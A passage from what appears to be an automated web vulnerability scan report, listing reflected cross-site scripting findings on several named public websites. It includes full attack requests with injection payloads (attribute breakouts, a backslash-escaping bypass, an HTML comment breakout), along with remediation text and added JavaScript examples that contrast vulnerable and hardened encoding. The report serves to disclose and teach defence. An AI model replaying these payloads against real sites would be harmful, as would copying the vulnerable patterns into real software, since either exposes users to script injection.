GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px85bb8"><script>alert(1)</script>18668a6627e&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:11:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
aaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px85bb8"><script>alert(1)</script>18668a6627e&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.192. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied, with no HTML-attribute encoding, into a double-quoted attribute value: the application echoes its whole query string back in the href of the <link rel="stylesheet"> tag that loads /themeroller/css/parseTheme.css.php. The payload 1431d"><script>alert(1)</script>4705b847df6 was submitted in the opacityOverlay parameter and appears unmodified in the response, where its double quote ends the href attribute and the > that follows ends the tag.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=301431d"><script>alert(1)</script>4705b847df6&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:10:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=301431d"><script>alert(1)</script>4705b847df6&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all
...[SNIP]...
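The themeroller findings above all share one sink: the request's query string is rebuilt into the href of a stylesheet <link>, so a double quote in any value closes the attribute and a > closes the tag. The following is an added example, not code from jqueryui.com, showing that pattern next to a version that applies the two encodings the context needs (percent-encoding for the URL, then entity-encoding for the attribute). The path /themeroller/theme.css is assumed for the example; the real stylesheet endpoint is not shown in the report.

```javascript
// Added example; not jqueryui.com's code. Path /themeroller/theme.css is an
// assumption made for this illustration.

// Vulnerable pattern from the themeroller findings: the raw query string is
// pasted straight into a double-quoted href.
function stylesheetLinkVulnerable(rawQuery) {
  return '<link href="/themeroller/theme.css?' + rawQuery +
         '" type="text/css" media="all" />';
}

// Entity-encode the five characters that matter inside a quoted attribute.
const ATTR_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function htmlAttrEncode(s) {
  return s.replace(/[&<>"']/g, (c) => ATTR_ENTITIES[c]);
}

// Hardened: two encoding layers, applied inside-out.
//   1. percent-encode every name and value for the URL query (URLSearchParams)
//   2. entity-encode the finished URL for the HTML attribute it sits in
function stylesheetLinkHardened(params) {
  const qs = new URLSearchParams(params).toString();
  return '<link href="' + htmlAttrEncode('/themeroller/theme.css?' + qs) +
         '" type="text/css" media="all" />';
}

// Check 1: does a <script tag appear anywhere in the rendered markup?
function containsScriptTag(markup) {
  return /<script\b/i.test(markup);
}

// Check 2: recover the parameters the browser would send when it fetches the
// stylesheet by reversing the two layers in the opposite order (entity decode,
// then URL parse). This shows the data survives the encoding unchanged.
function paramsFromTag(tag) {
  const m = /href="([^"]*)"/.exec(tag);
  if (!m) return null;
  const href = m[1].replace(/&(amp|lt|gt|quot|#39);/g,
    (e) => ({ '&amp;': '&', '&lt;': '<', '&gt;': '>', '&quot;': '"', '&#39;': "'" }[e]));
  return new URL(href, 'http://example.invalid').searchParams;
}
```

The order of the layers matters: the URL encoder runs first because its output is what the attribute encoder must protect, and the browser undoes them in reverse (entity decoding when it parses the tag, percent decoding when the server reads the query). The payload from the opacityOverlay finding above comes back out of paramsFromTag byte for byte, so the fix loses no functionality.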

3.193. http://jqueryui.com/themeroller/ [opacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f99f"><script>alert(1)</script>6d451900ce7 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=304f99f"><script>alert(1)</script>6d451900ce7&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:11:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=304f99f"><script>alert(1)</script>6d451900ce7&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.194. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb954"><script>alert(1)</script>367a87104dd was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxcb954"><script>alert(1)</script>367a87104dd&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:11:11 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxcb954"><script>alert(1)</script>367a87104dd&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.195. http://mercurynews.stats.com/fb/scoreboard.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mercurynews.stats.com
Path:   /fb/scoreboard.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4e21"><script>alert(1)</script>284f253951f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fb/scoreboard.asp?e4e21"><script>alert(1)</script>284f253951f=1 HTTP/1.1
Host: mercurynews.stats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private, max-age=10
Date: Mon, 15 Nov 2010 02:08:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52877

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Sports - NFL - Scoreboards - San Jose Mercury News</title>

<div id="omniture" style="display:none;">
<!-- S
...[SNIP]...
<META content="60;/fb/scoreboard.asp?e4e21"><script>alert(1)</script>284f253951f=1&amp;meta=true" http-equiv="Refresh">
...[SNIP]...

3.196. http://msn.foxsports.com/nfl/story/San-Francisco-49ers-notebook-Michael-Lewis-feeds-new-team-St-Louis-Rams-information-about-his-old-team-70614230 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://msn.foxsports.com
Path:   /nfl/story/San-Francisco-49ers-notebook-Michael-Lewis-feeds-new-team-St-Louis-Rams-information-about-his-old-team-70614230

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9704c'-alert(1)-'518f21c5656 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nfl/story/San-Francisco-49ers-notebook-Michael-Lewis-feeds-new-team-St-Louis-Rams-information-about-his-old-team-70614230?9704c'-alert(1)-'518f21c5656=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 234313
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=AE79DE3284C33592F90AA3B7DC247CB6; Path=/
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=27
Date: Sun, 14 Nov 2010 23:14:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
'http://msn.foxsports.com/account/ead?type=PP&fu=' + 'http://msn.foxsports.com/nfl/story/San-Francisco-49ers-notebook-Michael-Lewis-feeds-new-team-St-Louis-Rams-information-about-his-old-team-70614230?9704c'-alert(1)-'518f21c5656=1';

       startComments('StoryComments', '21950027'); // load up team comments
   </script>
...[SNIP]...

3.197. http://newspaperads.mercurynews.com/FSI/Page.aspx [version parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://newspaperads.mercurynews.com
Path:   /FSI/Page.aspx

Issue detail

The value of the version request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 454b3\'%3balert(1)//851c49b677b was submitted in the version parameter. This input was echoed as 454b3\\';alert(1)//851c49b677b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If echoing user input into a quoted JavaScript string is unavoidable, the backslash character must be blocked or escaped (replaced with two backslashes), and that escaping must be applied before the quotation marks are escaped; otherwise the input's own backslash neutralises the one the application adds.

Request

GET /FSI/Page.aspx?advid=200177&loc=53824&fsi=14784&version=Mercury454b3\'%3balert(1)//851c49b677b HTTP/1.1
Host: newspaperads.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; s_cc=true; ZZFLSH=29; location=53824; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Nov 2010 02:09:23 GMT
Server: Microsoft-IIS/6.0
X-Server-Name: HW3
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48110


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" x
...[SNIP]...
newspaperads.mercurynews.com';

s_pageName = '';
s_channel = 'FSI';
s_prop4 = 'FSI | | - |';
s_prop3 = 'FSI |';
s_prop5 = 'FSI |';
s_prop13 = 'FSI |';
s_prop20 = 'FSI | | 53824 | | 14784 | Mercury454b3\\';alert(1)//851c49b677b | - | Page 1';
s_az.pageName = 'FSI | Page View';
s_az.channel = 'FSI';
s_az.pageType = '';
s_az.prop1 = '';
s_az.prop2 = '';
s_az.prop3 = 'FSI |';
s_az.prop4 = 'FSI | | | - |';
s_az.prop5 = 'FSI |'
...[SNIP]...
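The escaping bypass described in 3.197, reproduced as an added example (this is not the scanned site's code). The naive escaper below behaves like the server did, turning the submitted \' into \\' so that the second backslash is consumed by the first and the quote closes the string. The hardened escaper puts the backslash in the escape set and also neutralises the other route out of a script block, a literal </script> inside the data, which quote escaping alone never addresses. The s_prop20 assignment is modelled on the response shown above; the helper names are this example's own.

```javascript
// Added example; not code from the scanned site.

// Naive escaper: a backslash in front of every quote, nothing else. This is
// the behaviour observed in finding 3.197.
function naiveJsEscape(s) {
  return s.replace(/['"]/g, (q) => '\\' + q);
}

// Correct escaper for data placed inside a quoted JS string literal that is
// itself inside an HTML <script> block. Backslash is in the class, so an
// attacker-supplied \ becomes \u005c and can no longer swallow the escape
// added for the quote. <, >, / and line terminators are escaped because the
// HTML parser ends the script element at </script> regardless of JS quoting.
function jsStringEscape(s) {
  return s.replace(/[\\'"<>\/\r\n\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Emit the kind of analytics assignment the report shows (s_prop20 = '...';).
function renderAssignment(value, escaper) {
  return "s_prop20 = 'FSI | " + escaper(value) + " | - | Page 1';";
}

// Lex the single-quoted literal the way a JS engine does (a backslash consumes
// the following character) and report whether it closes exactly at the end of
// the statement. If it closes early, the rest of the value runs as code.
function literalStaysClosed(line) {
  let i = line.indexOf("'") + 1;
  while (i < line.length) {
    if (line[i] === '\\') { i += 2; continue; }
    if (line[i] === "'") break;
    i++;
  }
  return i === line.length - 2; // closing quote sits right before the final ';'
}

// Second failure mode: quote escaping is irrelevant if the value can close the
// <script> element itself.
function containsScriptClose(line) {
  return /<\/script/i.test(line);
}
```

JSON.stringify gets the backslash ordering right on its own, but it leaves </script> untouched, so a value that is serialised with it and then inlined into a script block still needs the < replacement above.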

3.198. http://onlinehelp.microsoft.com/en-US/bing/ff808523.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-US/bing/ff808523.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8b9a"><script>alert(1)</script>a63a2a31e98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-US/bing/ff808523.aspx?f8b9a"><script>alert(1)</script>a63a2a31e98=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAABtBwAA4XNQCXpBTPk7cZerNYh7mA!!&M=1; domain=.microsoft.com; expires=Wed, 14-Nov-2040 23:14:04 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 14-Nov-2040 23:14:04 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:14:04 GMT
Content-Length: 40552


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Get%20the%20latest%20news&body=http://onlinehelp.microsoft.com/en-us/bing/ff808523.aspx?f8b9a"><script>alert(1)</script>a63a2a31e98=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

3.199. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-US/bing/ff808535.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6070d"><script>alert(1)</script>ad7ec223932 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-US/bing/ff808535.aspx?6070d"><script>alert(1)</script>ad7ec223932=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAAAFCgAAMPi17N5G3bmz8kqV4D9PUg!!&M=1; domain=.microsoft.com; expires=Wed, 14-Nov-2040 23:14:04 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 14-Nov-2040 23:14:04 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 14 Nov 2010 23:14:03 GMT
Content-Length: 43681


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help&body=http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx?6070d"><script>alert(1)</script>ad7ec223932=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

3.200. https://secure.www.mercurynews.com/portlet/registration/html/info.jsp [rFreeForm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.www.mercurynews.com
Path:   /portlet/registration/html/info.jsp

Issue detail

The value of the rFreeForm request parameter is copied into an HTML comment. The payload c15c0--><script>alert(1)</script>f18d1ae576c was submitted in the rFreeForm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within an HTML comment does not prevent XSS: the sequence --> (and, in HTML5 parsers, --!>) closes the comment, and everything that follows it is parsed as ordinary markup, as the response below shows.

Request

GET /portlet/registration/html/info.jsp?rFreeForm=8101685c15c0--><script>alert(1)</script>f18d1ae576c HTTP/1.1
Host: secure.www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 15 Nov 2010 02:09:35 GMT
Server: Apache/2.0.52 (Red Hat)
X-ATG-Version: ATGPlatform/7.1p2 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Set-Cookie: JSESSIONID=ZWT54CTJMPJ20CUUCBWCFFA; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Content-Length: 1676
Connection: close
Content-Type: text/html; charset=UTF-8

<html><head><script><!--
           window.focus();
       //--></script><link type="text/css" rel="stylesheet" href='https://secure.extras.mnginteractive.com/live/css/MNGiDefaultStyles.css'><script>
           function o
...[SNIP]...
<!-- BEGIN FREEFORM RENDER, ID 8101685c15c0--><script>alert(1)</script>f18d1ae576c -->
...[SNIP]...
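The comment-context reflection in 3.200, as an added example that is not the scanned site's code. It pairs the vulnerable renderer with one that never emits untrusted data into the comment, and includes a small tokenizer-style check that tracks comment state the way an HTML5 parser does, so that a <script tag is only counted when it lands outside a comment. The id format (alphanumeric, up to 64 characters) is an assumption made for the example.

```javascript
// Added example; not code from the scanned site.

// Vulnerable pattern: the request parameter is pasted into a comment verbatim.
function renderFreeformVulnerable(id) {
  return '<!-- BEGIN FREEFORM RENDER, ID ' + id + ' -->\n<div class="freeform"></div>';
}

// Hardened: the id is treated as an opaque token. The format (alphanumeric,
// up to 64 chars) is an assumption for this example; anything else is replaced
// by a fixed marker rather than encoded, because there is no standard encoder
// for the comment context and the comment is not meant for the user anyway.
function renderFreeformHardened(id) {
  const token = /^[A-Za-z0-9]{1,64}$/.test(id) ? id : 'invalid-id';
  return '<!-- BEGIN FREEFORM RENDER, ID ' + token + ' -->\n<div class="freeform"></div>';
}

// Walk the markup tracking comment state the way an HTML5 tokenizer does:
// <!-- opens a comment, --> or --!> closes it. Report whether a <script tag
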